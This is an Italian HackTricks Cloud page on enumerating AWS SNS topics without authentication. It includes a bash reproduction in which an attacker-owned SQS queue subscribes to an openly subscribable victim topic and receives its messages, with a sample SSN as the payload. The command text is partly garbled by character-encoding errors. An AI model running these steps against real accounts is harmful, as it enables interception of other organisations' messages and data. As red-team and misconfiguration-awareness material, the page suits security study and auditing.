HackTricks CloudAWS - SNS Unauthenticated Enum
Tip
Impara & pratica AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Impara & pratica GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Impara & pratica Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Sostieni HackTricks
- Controlla i subscription plans!
- Unisciti al đŹ Discord group o al telegram group o seguici su Twitter đŚ @hacktricks_live.
- Condividi hacking tricks inviando PRs ai HackTricks e HackTricks Cloud github repos.
SNS
Per maggiori informazioni su SNS consulta:
Aperto a tutti
Quando configuri un topic SNS dalla web console, è possibile indicare che Everyone can publish and subscribe al topic:
.png)
Quindi, se trovi lâARN dei topic allâinterno dellâaccount (o effettuando brute forcing sui possibili nomi dei topic), puoi verificare se puoi publish o subscribe a them.
Questo equivale a una resource policy di un topic SNS che autorizza sns:Subscribe a * (o ad account esterni): qualsiasi principal può creare una subscription che consegna tutti i futuri messaggi del topic a una SQS queue di cui è proprietario. Quando il proprietario della queue avvia la subscription, non è richiesta alcuna conferma umana per gli SQS endpoints.
Riproduzione (us-east-1)
```bash REGION=us-east-1 # Victim account (topic owner) VICTIM_TOPIC_ARN=$(aws sns create-topic --name exfil-victim-topic-$(date +%s) --region $REGION --query TopicArn --output text)Open the topic to anyone subscribing
cat > /tmp/topic-policy.json <<JSON {âVersionâ:â2012-10-17â,âStatementâ:[{âSidâ:âOpenSubscribeâ,âEffectâ:âAllowâ,âPrincipalâ:â*â,âActionâ:âsns:Subscribeâ,âResourceâ:â$VICTIM_TOPIC_ARNâ}]} JSON aws sns set-topic-attributes âregion $REGION âtopic-arn â$VICTIM_TOPIC_ARNâ âattribute-name Policy âattribute-value file:///tmp/topic-policy.json
Attacker account (queue owner)
ATTACKER_Q_URL=$(aws sqs create-queue âqueue-name attacker-exfil-queue-$(date +%s) âregion $REGION âquery QueueUrl âoutput text) ATTACKER_Q_ARN=$(aws sqs get-queue-attributes âqueue-url â$ATTACKER_Q_URLâ âregion $REGION âattribute-names QueueArn âquery Attributes.QueueArn âoutput text)
Allow the victim topic to send to the attacker queue
cat > /tmp/sqs-policy.json <<JSON {âVersionâ:â2012-10-17â,âStatementâ:[{âSidâ:âAllowVictimTopicSendâ,âEffectâ:âAllowâ,âPrincipalâ:{âServiceâ:âsns.amazonaws.comâ},âActionâ:âsqs:SendMessageâ,âResourceâ:â$ATTACKER_Q_ARNâ,âConditionâ:{âArnEqualsâ:{âaws:SourceArnâ:â$VICTIM_TOPIC_ARNâ}}}]} JSON aws sqs set-queue-attributes âqueue-url â$ATTACKER_Q_URLâ âregion $REGION âattributes Policy=â$(cat /tmp/sqs-policy.json)â
Subscribe the attacker queue to the victim topic (auto-confirmed for SQS)
SUB_ARN=$(aws sns subscribe âregion $REGION âtopic-arn â$VICTIM_TOPIC_ARNâ âprotocol sqs ânotification-endpoint â$ATTACKER_Q_ARNâ âquery SubscriptionArn âoutput text)
Validation: publish and receive
aws sns publish âregion $REGION âtopic-arn â$VICTIM_TOPIC_ARNâ âmessage {pii:ssn:123-45-6789} aws sqs receive-message âqueue-url â$ATTACKER_Q_URLâ âregion $REGION âmax-number-of-messages 1 âwait-time-seconds 10 âquery Messages[0].Body âoutput text
</details>
> [!TIP]
> Impara & pratica AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Impara & pratica GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Impara & pratica Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Sostieni HackTricks</summary>
>
> - Controlla i [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Unisciti al** đŹ [**Discord group**](https://discord.gg/hRep4RUj7f) o al [**telegram group**](https://t.me/peass) o **seguici** su **Twitter** đŚ [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Condividi hacking tricks inviando PRs ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>